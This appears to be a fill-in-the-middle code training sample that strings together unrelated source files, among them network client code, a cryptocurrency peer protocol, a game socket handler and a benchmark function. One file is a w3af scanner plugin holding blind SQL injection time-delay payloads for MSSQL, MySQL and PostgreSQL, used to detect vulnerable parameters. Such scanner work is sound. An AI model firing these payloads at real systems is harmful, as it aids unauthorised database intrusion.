Only idempotent requests should retry failed connection attempts.
:raises: ConnectionFailed if the maximum # of retries is exceeded
"""
max_attempts = self.retries + 1
for i in range(max_attempts):
try:
return self.do_request(method, action, body=body,
headers=headers, params=params)
except exceptions.ConnectionFailed:
# Exception has already been logged by do_request()
if i < self.retries:
_logger.debug('Retrying connection to Neutron service')
time.sleep(self.retry_interval)
elif self.raise_errors:
raise
if self.retries:
msg = (_("Failed to connect to Neutron server after %d attempts")
% max_attempts)
else:
msg = _("Failed to connect Neutron server")
raise exceptions.ConnectionFailed(reason=msg)
def delete(self, action, body=None, headers=None, params=None):
return self.retry_request("DELETE", action, body=body,
headers=headers, params=params)
def get(self, action, body=None, headers=None, params=None):
return self.retry_request("GET", action, body=body,
headers=headers, params=params)
def post(self, action, body=None, headers=None, params=None):
# Do not retry POST requests to avoid the orphan objects problem.
return self.do_request("POST", action, body=body,
headers=headers, params=params)
def put(self, action, body=None, headers=None, params=None):
return self.retry_request("PUT", action, body=body,
headers=headers, params=params)
def list(self, collection, path, retrieve_all=True, **params):
if retrieve_all:
res = []
for r in self._pagination(collection, path, **params):
res.extend(r[collection])
return {collection: res}
else:
return self._pagination(collection, path, **params)
def _pagination(self, collection, path, **params):
if params.get('page_reverse', False):
linkrel = 'previous'
else:
linkrel = 'next'
next = True
while next:
res = self.get(path, params=params)
yield res
next = False
try:
for link in res['%s_links' % collection]:
if link['rel'] == linkrel:
query_str = urlparse.urlparse(link['href']).query
params = urlparse.parse_qs(query_str)
next = True
break
except KeyError:
break<|fim▁end|> | """Serializes a dictionary into either XML or JSON.
A dictionary with a single key can be passed and it can contain any
structure. |
<|file_name|>protocol.cpp<|end_file_name|><|fim▁begin|>/**
* Copyright (c) 2011-2018 libgroestlcoin developers (see AUTHORS)
*
* This file is part of libgroestlcoin.
*
* libgroestlcoin is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License with
* additional permissions to the one published by the Free Software
* Foundation, either version 3 of the License, or (at your option)
* any later version. For more information see LICENSE.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <groestlcoin/groestlcoin/network/protocol.hpp>
#include <cstddef>
#include <cstdint>
#include <functional>
#include <memory>
#include <system_error>
#include <boost/date_time.hpp>
#include <boost/filesystem.hpp>
#include <boost/format.hpp>
#include <groestlcoin/groestlcoin/error.hpp>
#include <groestlcoin/groestlcoin/network/authority.hpp>
#include <groestlcoin/groestlcoin/network/hosts.hpp>
#include <groestlcoin/groestlcoin/network/handshake.hpp>
#include <groestlcoin/groestlcoin/network/seeder.hpp>
#include <groestlcoin/groestlcoin/utility/logger.hpp>
#include <groestlcoin/groestlcoin/utility/threadpool.hpp>
namespace libgroestlcoin {
namespace network {
using std::placeholders::_1;
using std::placeholders::_2;
using boost::filesystem::path;
using boost::format;
using boost::posix_time::time_duration;
using boost::posix_time::seconds;
// Based on http://bitcoinstats.com/network/dns-servers
#ifdef ENABLE_TESTNET
const hosts::authority_list protocol::default_seeds =
{
{ "testnet-seed.alexykot.me", 18333 },
{ "testnet-seed.bitcoin.petertodd.org", 18333 },
{ "testnet-seed.bluematt.me", 18333 },
{ "testnet-seed.bitcoin.schildbach.de", 18333 }
};
#else
const hosts::authority_list protocol::default_seeds =
{
{ "seed.bitnodes.io", 8333 },
{ "seed.bitcoinstats.com", 8333 },
{ "seed.bitcoin.sipa.be", 8333 },
{ "dnsseed.bluematt.me", 8333 },
{ "seed.bitcoin.jonasschnelli.ch", 8333 },
{ "dnsseed.bitcoin.dashjr.org", 8333 }
// Previously also included:
// bitseed.xf2.org:8333
// archivum.info:8333
// progressbar.sk:8333
// faucet.bitcoin.st:8333
// bitcoin.securepayment.cc:8333
};
#endif
const size_t protocol::default_max_outbound = 8;
// TODO: parameterize for config access.
const size_t watermark_connection_limit = 10;
const time_duration watermark_reset_interval = seconds(1);
protocol::protocol(threadpool& pool, hosts& peers, handshake& shake,
network& net, const hosts::authority_list& seeds, uint16_t port,
size_t max_outbound)
: strand_(pool),
host_pool_(peers),
handshake_(shake),
network_(net),
max_outbound_(max_outbound),
watermark_timer_(pool.service()),
watermark_count_(0),
listen_port_(port),
channel_subscribe_(std::make_shared<channel_subscriber_type>(pool)),
seeds_(seeds)
{
}
void protocol::start(completion_handler handle_complete)
{
// handshake.start doesn't accept an error code so we prevent its
// execution in case of start failure, using this lambda wrapper.
const auto start_handshake = [this, handle_complete]
(const std::error_code& ec)
{
if (ec)
{
handle_complete(ec);
return;
}
strand_.wrap(&handshake::start,
&handshake_, handle_complete)();
};
const auto run_protocol =
strand_.wrap(&protocol::handle_start,
this, _1, start_handshake);
host_pool_.load(
strand_.wrap(&protocol::fetch_count,
this, _1, run_protocol));
}
void protocol::handle_start(const std::error_code& ec,
completion_handler handle_complete)
{
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Failure fetching height: " << ec.message();
handle_complete(ec);
return;
}
// TODO: handle run startup failure.
handle_complete(ec);
run();
}
void protocol::stop(completion_handler handle_complete)
{
host_pool_.save(
strand_.wrap(&protocol::handle_stop,
this, _1, handle_complete));
}
void protocol::handle_stop(const std::error_code& ec,
completion_handler handle_complete)
{
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Failure saving hosts file: " << ec.message();
handle_complete(ec);
return;
}
channel_subscribe_->relay(error::service_stopped, nullptr);
handle_complete(error::success);
}
void protocol::fetch_count(const std::error_code& ec,
completion_handler handle_complete)
{
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Failure loading hosts file: " << ec.message();
handle_complete(ec);
return;
}
host_pool_.fetch_count(
strand_.wrap(&protocol::start_seeder,
this, _1, _2, handle_complete));
}
void protocol::start_seeder(const std::error_code& ec, size_t hosts_count,
completion_handler handle_complete)
{<|fim▁hole|> log_error(LOG_PROTOCOL)
<< "Failure checking existing hosts file: " << ec.message();
handle_complete(ec);
return;
}
if (hosts_count == 0)
{
seeder_ = std::make_shared<seeder>(this, seeds_, handle_complete);
seeder_->start();
return;
}
handle_complete(error::success);
}
std::string protocol::state_to_string(connect_state state) const
{
switch (state)
{
case connect_state::finding_peer:
return "finding peer";
case connect_state::connecting:
return "connecting to peer";
case connect_state::established:
return "established connection";
case connect_state::stopped:
return "stopped";
}
// Unhandled state!
BITCOIN_ASSERT(false);
return "";
}
void protocol::modify_slot(slot_index slot, connect_state state)
{
connect_states_[slot] = state;
log_debug(LOG_PROTOCOL)
<< "Outbound connection on slot ["
<< slot << "] " << state_to_string(state) << ".";
}
void protocol::run()
{
strand_.queue(
std::bind(&protocol::start_connecting,
this));
if (listen_port_ == 0)
return;
// Unhandled startup failure condition.
network_.listen(listen_port_,
strand_.wrap(&protocol::handle_listen,
this, _1, _2));
}
void protocol::start_connecting()
{
// Initialize the connection slots.
BITCOIN_ASSERT(connections_.empty());
BITCOIN_ASSERT(connect_states_.empty());
connect_states_.resize(max_outbound_);
for (size_t slot = 0; slot < connect_states_.size(); ++slot)
modify_slot(slot, connect_state::stopped);
// Start the main outbound connect loop.
start_stopped_connects();
start_watermark_reset_timer();
}
void protocol::start_stopped_connects()
{
for (size_t slot = 0; slot < connect_states_.size(); ++slot)
if (connect_states_[slot] == connect_state::stopped)
try_connect_once(slot);
}
void protocol::try_connect_once(slot_index slot)
{
++watermark_count_;
if (watermark_count_ > watermark_connection_limit)
return;
BITCOIN_ASSERT(slot <= connect_states_.size());
BITCOIN_ASSERT(connect_states_[slot] == connect_state::stopped);
// Begin connection flow: finding_peer -> connecting -> established.
// Failures end with connect_state::stopped and loop back here again.
modify_slot(slot, connect_state::finding_peer);
host_pool_.fetch_address(
strand_.wrap(&protocol::attempt_connect,
this, _1, _2, slot));
}
void protocol::start_watermark_reset_timer()
{
// This timer just loops continuously at fixed intervals
// resetting the watermark_count_ variable and starting stopped slots.
const auto reset_watermark = [this](const boost::system::error_code& ec)
{
if (ec)
{
if (ec != boost::asio::error::operation_aborted)
log_error(LOG_PROTOCOL)
<< "Failure resetting watermark timer: " << ec.message();
BITCOIN_ASSERT(ec == boost::asio::error::operation_aborted);
return;
}
if (watermark_count_ > watermark_connection_limit)
log_debug(LOG_PROTOCOL)
<< "Resuming connection attempts.";
// Perform the reset, reallowing connection attempts.
watermark_count_ = 0;
start_stopped_connects();
// Looping timer...
start_watermark_reset_timer();
};
watermark_timer_.expires_from_now(watermark_reset_interval);
watermark_timer_.async_wait(strand_.wrap(reset_watermark, _1));
}
template <typename ConnectionList>
bool already_connected(const network_address_type& address,
const ConnectionList& connections)
{
for (const auto& connection: connections)
if (connection.address.ip == address.ip &&
connection.address.port == address.port)
return true;
return false;
}
void protocol::attempt_connect(const std::error_code& ec,
const network_address_type& address, slot_index slot)
{
BITCOIN_ASSERT(connect_states_[slot] == connect_state::finding_peer);
modify_slot(slot, connect_state::connecting);
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Failure randomly selecting a peer address for slot ["
<< slot << "] " << ec.message();
return;
}
if (already_connected(address, connections_))
{
log_debug(LOG_PROTOCOL)
<< "Already connected to selected peer ["
<< authority(address).to_string() << "]";
// Retry another connection, still in same strand.
modify_slot(slot, connect_state::stopped);
try_connect_once(slot);
return;
}
log_debug(LOG_PROTOCOL)
<< "Connecting to peer [" << authority(address).to_string()
<< "] on slot [" << slot << "]";
const authority peer(address);
connect(handshake_, network_, peer.host, peer.port,
strand_.wrap(&protocol::handle_connect,
this, _1, _2, address, slot));
}
void protocol::handle_connect(const std::error_code& ec, channel_ptr node,
const network_address_type& address, slot_index slot)
{
BITCOIN_ASSERT(connect_states_[slot] == connect_state::connecting);
if (ec || !node)
{
log_debug(LOG_PROTOCOL)
<< "Failure connecting to peer ["
<< authority(address).to_string() << "] on slot [" << slot << "] "
<< ec.message();
// Retry another connection, still in same strand.
modify_slot(slot, connect_state::stopped);
try_connect_once(slot);
return;
}
modify_slot(slot, connect_state::established);
BITCOIN_ASSERT(connections_.size() <= max_outbound_);
connections_.push_back({address, node});
log_info(LOG_PROTOCOL)
<< "Connected to peer ["
<< authority(address).to_string() << "] on slot [" << slot << "] ("
<< connections_.size() << " total)";
// Remove channel from list of connections
node->subscribe_stop(
strand_.wrap(&protocol::outbound_channel_stopped,
this, _1, node, slot));
setup_new_channel(node);
}
void protocol::maintain_connection(const std::string& hostname, uint16_t port)
{
connect(handshake_, network_, hostname, port,
strand_.wrap(&protocol::handle_manual_connect,
this, _1, _2, hostname, port));
}
void protocol::handle_manual_connect(const std::error_code& ec,
channel_ptr node, const std::string& hostname, uint16_t port)
{
if (ec || !node)
{
log_debug(LOG_PROTOCOL)
<< "Failure connecting manually to peer ["
<< authority(hostname, port).to_string() << "] " << ec.message();
// Retry connect.
maintain_connection(hostname, port);
return;
}
manual_connections_.push_back(node);
// Connected!
log_info(LOG_PROTOCOL)
<< "Connection to peer established manually ["
<< authority(hostname, port).to_string() << "]";
// Subscript to channel stop notifications.
node->subscribe_stop(
strand_.wrap(&protocol::manual_channel_stopped,
this, _1, node, hostname, port));
setup_new_channel(node);
}
void protocol::handle_listen(const std::error_code& ec, acceptor_ptr accept)
{
if (!accept)
return;
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Error while starting listener: " << ec.message();
return;
}
// Listen for connections.
accept->accept(
strand_.wrap(&protocol::handle_accept,
this, _1, _2, accept));
}
void protocol::handle_accept(const std::error_code& ec, channel_ptr node,
acceptor_ptr accept)
{
if (!accept)
return;
// Relisten for connections.
accept->accept(
strand_.wrap(&protocol::handle_accept,
this, _1, _2, accept));
if (ec)
{
if (node)
log_debug(LOG_PROTOCOL)
<< "Failure accepting connection from ["
<< node->address().to_string() << "] " << ec.message();
else
log_debug(LOG_PROTOCOL)
<< "Failure accepting connection: " << ec.message();
return;
}
accepted_channels_.push_back(node);
log_info(LOG_PROTOCOL)
<< "Accepted connection from [" << node->address().to_string() << "] ("
<< accepted_channels_.size() << " total)";
const auto handshake_complete = [this, node](const std::error_code& ec)
{
if (!node)
return;
if (ec)
{
log_debug(LOG_PROTOCOL) << "Failure in handshake from ["
<< node->address().to_string() << "] " << ec.message();
return;
}
// Remove channel from list of connections
node->subscribe_stop(
strand_.wrap(&protocol::inbound_channel_stopped,
this, _1, node));
setup_new_channel(node);
};
handshake_.ready(node, handshake_complete);
}
void protocol::setup_new_channel(channel_ptr node)
{
if (!node)
return;
const auto handle_send = [node](const std::error_code& ec)
{
if (!node)
return;
if (ec)
{
log_debug(LOG_PROTOCOL) << "Send error ["
<< node->address().to_string() << "] " << ec.message();
}
};
// Subscribe to address messages.
node->subscribe_address(
strand_.wrap(&protocol::handle_address_message,
this, _1, _2, node));
node->send(get_address_type(), handle_send);
// Notify subscribers
channel_subscribe_->relay(error::success, node);
}
template <typename ConnectionsList>
void remove_connection(ConnectionsList& connections, channel_ptr node)
{
auto it = connections.begin();
for (; it != connections.end(); ++it)
if (it->node == node)
break;
BITCOIN_ASSERT(it != connections.end());
connections.erase(it);
}
void protocol::outbound_channel_stopped(const std::error_code& ec,
channel_ptr node, slot_index slot)
{
// We must always attempt a reconnection.
if (ec)
{
if (node)
log_debug(LOG_PROTOCOL)
<< "Channel stopped (outbound) ["
<< node->address().to_string() << "] " << ec.message();
else
log_debug(LOG_PROTOCOL)
<< "Channel stopped (outbound): " << ec.message();
}
// Erase this channel from our list and then attempt a reconnection.
remove_connection(connections_, node);
BITCOIN_ASSERT(connect_states_[slot] == connect_state::established);
modify_slot(slot, connect_state::stopped);
// Attempt reconnection.
try_connect_once(slot);
}
template <typename ChannelsList>
void remove_channel(ChannelsList& channels, channel_ptr node)
{
const auto it = std::find(channels.begin(), channels.end(), node);
BITCOIN_ASSERT(it != channels.end());
channels.erase(it);
}
void protocol::manual_channel_stopped(const std::error_code& ec,
channel_ptr node, const std::string& hostname, uint16_t port)
{
// We must always attempt a reconnection.
if (ec)
{
if (node)
log_debug(LOG_PROTOCOL)
<< "Channel stopped (manual) ["
<< authority(hostname, port).to_string() << "] " << ec.message();
else
log_debug(LOG_PROTOCOL)
<< "Channel stopped (manual): " << ec.message();
}
// Remove from accepted connections.
// Timeout logic would go here if we ever need it.
remove_channel(manual_connections_, node);
// Attempt reconnection.
maintain_connection(hostname, port);
}
void protocol::inbound_channel_stopped(const std::error_code& ec,
channel_ptr node)
{
// We do not attempt to reconnect inbound connections.
if (ec)
{
if (node)
log_debug(LOG_PROTOCOL)
<< "Channel stopped (inbound) ["
<< node->address().to_string() << "] " << ec.message();
else
log_debug(LOG_PROTOCOL)
<< "Channel stopped (inbound): " << ec.message();
}
// Remove from accepted connections (no reconnect).
remove_channel(accepted_channels_, node);
}
void protocol::handle_address_message(const std::error_code& ec,
const address_type& packet, channel_ptr node)
{
if (!node)
return;
if (ec)
{
// TODO: reset the connection.
log_debug(LOG_PROTOCOL)
<< "Failure getting addresses from ["
<< node->address().to_string() << "] " << ec.message();
return;
}
log_debug(LOG_PROTOCOL)
<< "Storing addresses from [" << node->address().to_string() << "]";
for (const auto& net_address: packet.addresses)
host_pool_.store(net_address,
strand_.wrap(&protocol::handle_store_address,
this, _1));
// Subscribe to address messages.
node->subscribe_address(
strand_.wrap(&protocol::handle_address_message,
this, _1, _2, node));
}
void protocol::handle_store_address(const std::error_code& ec)
{
if (ec)
log_error(LOG_PROTOCOL) << "Failed to store address: "
<< ec.message();
}
void protocol::fetch_connection_count(
fetch_connection_count_handler handle_fetch)
{
strand_.queue(
std::bind(&protocol::do_fetch_connection_count,
this, handle_fetch));
}
void protocol::do_fetch_connection_count(
fetch_connection_count_handler handle_fetch)
{
handle_fetch(error::success, connections_.size());
}
void protocol::subscribe_channel(channel_handler handle_channel)
{
channel_subscribe_->subscribe(handle_channel);
}
size_t protocol::total_connections() const
{
return connections_.size() + manual_connections_.size() +
accepted_channels_.size();
}
void protocol::set_max_outbound(size_t max_outbound)
{
max_outbound_ = max_outbound;
}
void protocol::set_hosts_filename(const std::string& hosts_path)
{
host_pool_.file_path_ = hosts_path;
}
// Deprecated, this is problematic because there is no enabler.
void protocol::disable_listener()
{
listen_port_ = 0;
}
// Deprecated, should be private.
void protocol::bootstrap(completion_handler handle_complete)
{
}
} // namespace network
} // namespace libgroestlcoin<|fim▁end|> | if (ec)
{ |
<|file_name|>UnitProcessor.java<|end_file_name|><|fim▁begin|>package com.nepfix.sim.elements;
import com.nepfix.sim.core.Processor;
import java.util.Map;
public class UnitProcessor implements Processor {<|fim▁hole|>
private String id;
@Override public void init(String id, Map<String, String> args) {
this.id = id;
}
@Override public String process(String input) {
return input;
}
@Override public String getId() {
return id;
}
}<|fim▁end|> | |
<|file_name|>ApplicationTest.java<|end_file_name|><|fim▁begin|>package sl.hr_client;
import android.app.Application;
import android.test.ApplicationTestCase;
/**
* <a href="http://d.android.com/tools/testing/testing_android.html">Testing Fundamentals</a>
*/
public class ApplicationTest extends ApplicationTestCase<Application> {<|fim▁hole|> public ApplicationTest() {
super(Application.class);
}
}<|fim▁end|> | |
<|file_name|>blind_sqli_time_delay.py<|end_file_name|><|fim▁begin|>'''
blind_sqli_time_delay.py
Copyright 2008 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
from fuzzer import createMutants, createRandNum
import outputManager as om
import vuln as vuln
import knowledgeBase as kb
import severity as severity
import dbms as dbms
from w3afException import w3afException
# importing this to have sendMutant and setUrlOpener
from basePlugin import basePlugin
class blind_sqli_time_delay(basePlugin):
'''
This class tests for blind SQL injection bugs using time delays,
the logic is here and not as an audit plugin because this logic is also used in attack plugins.
@author: Andres Riancho ( [email protected] )
'''
def __init__(self, crawler):
# ""I'm a plugin""
basePlugin.__init__(self, crawler)
# The wait time of the first test I'm going to perform
self._wait_time = 5
# The original delay between request and response
_original_wait_time = 0
def is_injectable( self, freq, parameter ):
'''
Check if "parameter" of the fuzzable request object is injectable or not.
@freq: The fuzzableRequest object that I have to modify
@parameter: A string with the parameter name to test
@return: A vulnerability object or None if nothing is found
'''
# First save the original wait time
_original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
# Create the mutants
parameter_to_test = [ parameter, ]
statement_list = self._get_statements()
sql_commands_only = [ i.sql_command for i in statement_list ]
mutants = createMutants( freq , sql_commands_only, fuzzableParamList=parameter_to_test )
# And now I assign the statement to the mutant
for statement in statement_list:
for mutant in mutants:
if statement.sql_command in mutant.getModValue():
mutant.statement = statement.sql_command
mutant.dbms = statement.dbms
# Perform the test
for mutant in mutants:
# Send
response = self._sendMutant( mutant, analyze=False )
# Compare times
if response.getWaitTime() > (_original_wait_time + self._wait_time-2):
# Resend the same request to verify that this wasn't because of network delay
# or some other rare thing
_original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
response = self._sendMutant( mutant, analyze=False )
# Compare times (once again)
if response.getWaitTime() > (_original_wait_time + self._wait_time-2):
# Now I can be sure that I found a vuln, I control the time of the response.
v = vuln.vuln( mutant )
v.setName( 'Blind SQL injection - ' + mutant.dbms )
v.setSeverity(severity.HIGH)
v.setDesc( 'Blind SQL injection was found at: ' + mutant.foundAt() )
v.setDc( mutant.getDc() )
v.setId( response.id )
v.setURI( response.getURI() )
return v
return None
def _get_statements( self ):
'''
@return: A list of statements that are going to be used to test for
blind SQL injections. The statements are objects.
'''
res = []
# MSSQL
res.append( statement("1;waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1);waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1';waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )<|fim▁hole|>
# MySQL
# =====
# MySQL doesn't have a sleep function, so I have to use BENCHMARK(1000000000,MD5(1))
# but the benchmarking will delay the response a different amount of time in each computer
# which sucks because I use the time delay to check!
#
# In my test environment 3500000 delays 10 seconds
# This is why I selected 2500000 which is guaranteeded to (at least) delay 8
# seconds; and I only check the delay like this:
# response.getWaitTime() > (_original_wait_time + self._wait_time-2):
#
# With a small wait time of 5 seconds, this should work without problems...
# and without hitting the xUrllib timeout !
res.append( statement("1 or BENCHMARK(2500000,MD5(1))", dbms.MYSQL) )
res.append( statement("1' or BENCHMARK(2500000,MD5(1)) or '1'='1", dbms.MYSQL) )
res.append( statement('1" or BENCHMARK(2500000,MD5(1)) or "1"="1', dbms.MYSQL) )
# PostgreSQL
res.append( statement("1 or pg_sleep("+ str(self._wait_time) +")", dbms.POSTGRE) )
res.append( statement("1' or pg_sleep("+ str(self._wait_time) +") or '1'='1", dbms.POSTGRE) )
res.append( statement('1" or pg_sleep('+ str(self._wait_time) +') or "1"="1', dbms.POSTGRE) )
# TODO: Add Oracle support
# TODO: Add XXXXX support
return res
class statement(object):
def __init__(self, sql_command, dbms):
self.sql_command = sql_command
self.dbms = dbms<|fim▁end|> | res.append( statement("1');waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1'));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) ) |
<|file_name|>socket.js<|end_file_name|><|fim▁begin|>var multiplayer = new function(){
this.players = [];
this.add_player = function(player){
console.log("new player");
var scale = [1,1,1];
var data = {};
data['x1'] = 0;
data['y1'] = 0;
elements.add_OBJ(link_mushroom_obj,link_tree_texture,data, scale,"opponent",false, player.id);
};
this.remove_player = function(id){
scene.remove(multiplayer.players[""+id]);
delete multiplayer.players[""+id];
}
};
Arena.when({
playerMove: function (player) {
var local_player = multiplayer.players[""+player.id];
if(local_player == undefined){
return;
}
local_player.position.x = player.x;
local_player.position.y = player.y - 15;
local_player.position.z = player.z;
},
newRegularMushroom: function (position) {
elements.addMushroomWithPosition(position);
},<|fim▁hole|> elements.removeElementPositionMush(position);
},
newPlayer: function (player) {
multiplayer.add_player(player);
},
playerLeft: function (id) {
multiplayer.remove_player(id);
},
newMegaMushroom: function (position) {
position.isMegamush = true;
elements.addMushroomWithPosition(position);
},
updateScore: function (score) {
game.player.points = score[0];
game.opponent.points = score[1];
message.showScore();
},
displayMegaMushroom: function () {
message.showStrobMessage("MEGA MUSH !!",20);
},
displayMushroomWave: function () {
message.showStrobMessage("Vague de champignons !",20);
}
});<|fim▁end|> | pickupMushroom: function (id, team, position) { |
<|file_name|>defs.hpp<|end_file_name|><|fim▁begin|>/**
Copyright (c) 2017, Philip Deegan.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the
distribution.
* Neither the name of Philip Deegan nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef _KUL_DEFS_HPP_
#define _KUL_DEFS_HPP_
#define KSTRINGIFY(x) #x
#define KTOSTRING(x) KSTRINGIFY(x)
#ifdef KUL_SHARED
#if defined _WIN32 || defined __CYGWIN__
#ifdef KUL_EXPORT
#ifdef __GNUC__
#define KUL_PUBLISH __attribute__((dllexport))
#else
#define KUL_PUBLISH __declspec(dllexport)
#endif
#else
#ifdef __GNUC__
#define KUL_PUBLISH __attribute__((dllimport))
#else
#define KUL_PUBLISH __declspec(dllimport)
#endif
#endif
#else
#if __GNUC__ >= 4
#define KUL_PUBLISH __attribute__((visibility("default")))
#define KUL_PRIVATE __attribute__((visibility("hidden")))
#endif
#endif
#endif // KUL_SHARED
#ifndef KUL_PUBLISH
#define KUL_PUBLISH<|fim▁hole|>#define KUL_PRIVATE
#endif
#if defined(__APPLE__) || defined(__NetBSD__) || defined(__FreeBSD__)
#define KUL_IS_BSD 1
#endif
#if defined(_WIN32)
#define KUL_IS_WIN 1
#endif
#ifndef KUL_IS_WIN
#define KUL_IS_WIN 0
#endif
#ifndef KUL_IS_BSD
#define KUL_IS_BSD 0
#endif
#if !KUL_IS_WIN && !KUL_IS_BSD
#define KUL_IS_NIX 1
#endif
#ifndef KUL_IS_NIX
#define KUL_IS_NIX 0
#endif
#if !defined(NDEBUG) || defined(KUL_FORCE_DEBUG_DO)
#define KUL_DEBUG_DO(...) __VA_ARGS__
#define KUL_DEBUG_DO_ELSE(...)
#else
#define KUL_DEBUG_DO(...)
#define KUL_DEBUG_DO_ELSE(...) __VA_ARGS__
#endif
#include "kul/os/def.hpp"
#endif /* _KUL_DEFS_HPP_ */<|fim▁end|> | #endif
#ifndef KUL_PRIVATE |
<|file_name|>hartmann6.py<|end_file_name|><|fim▁begin|>'''
Created on 14.07.2015
@author: Aaron Klein
'''
import numpy as np
from robo.task.base_task import BaseTask
class Hartmann6(BaseTask):
def __init__(self):
X_lower = np.array([0, 0, 0, 0, 0, 0])
X_upper = np.array([1, 1, 1, 1, 1, 1])
opt = np.array([[0.20169, 0.150011, 0.476874, 0.275332, 0.311652, 0.6573]])
fopt = np.array([[-3.32237]])
<|fim▁hole|> [0.05, 10.00, 17.00, 0.10, 8.00, 14.00],
[3.00, 3.50, 1.70, 10.00, 17.00, 8.00],
[17.00, 8.00, 0.05, 10.00, 0.10, 14.00]])
self.P = 0.0001 * np.array([[1312, 1696, 5569, 124, 8283, 5886],
[2329, 4135, 8307, 3736, 1004, 9991],
[2348, 1451, 3522, 2883, 3047, 6650],
[4047, 8828, 8732, 5743, 1091, 381]])
def objective_function(self, x):
"""6d Hartmann test function
input bounds: 0 <= xi <= 1, i = 1..6
global optimum: (0.20169, 0.150011, 0.476874, 0.275332, 0.311652, 0.6573),
min function value = -3.32237
"""
external_sum = 0
for i in range(4):
internal_sum = 0
for j in range(6):
internal_sum = internal_sum + self.A[i, j] * (x[:, j] - self.P[i, j]) ** 2
external_sum = external_sum + self.alpha[i] * np.exp(-internal_sum)
return -external_sum[:, np.newaxis]
def objective_function_test(self, x):
return self.objective_function(x)<|fim▁end|> | super(Hartmann6, self).__init__(X_lower, X_upper, opt, fopt)
self.alpha = [1.00, 1.20, 3.00, 3.20]
self.A = np.array([[10.00, 3.00, 17.00, 3.50, 1.70, 8.00], |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
#
# TheVirtualBrain-Framework Package. This package holds all Data Management, and
# Web-UI helpful to run brain-simulations. To use it, you also need do download
# TheVirtualBrain-Scientific Package (for simulators). See content of the
# documentation-folder for more details. See also http://www.thevirtualbrain.org
#
# (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest")
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the Free
# Software Foundation. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details. You should have received a copy of the GNU General
# Public License along with this program; if not, you can download it here
# http://www.gnu.org/licenses/old-licenses/gpl-2.0
#
#
# CITATION:
# When using The Virtual Brain for scientific publications, please cite it as follows:
#
# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,
# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)
# The Virtual Brain: a simulator of primate brain network dynamics.
# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)
#
#
"""
Install TVB Framework package for developers.
Execute:
python setup.py install/develop
"""<|fim▁hole|>import os
import shutil
import setuptools
VERSION = "1.4"
TVB_TEAM = "Mihai Andrei, Lia Domide, Ionel Ortelecan, Bogdan Neacsa, Calin Pavel, "
TVB_TEAM += "Stuart Knock, Marmaduke Woodman, Paula Sansz Leon, "
TVB_INSTALL_REQUIREMENTS = ["apscheduler", "beautifulsoup", "cherrypy", "genshi", "cfflib", "formencode==1.3.0a1",
"h5py==2.3.0", "lxml", "minixsv", "mod_pywebsocket", "networkx", "nibabel", "numpy",
"numexpr", "psutil", "scikit-learn", "scipy", "simplejson", "PIL>=1.1.7",
"sqlalchemy==0.7.8", "sqlalchemy-migrate==0.7.2", "matplotlib==1.2.1"]
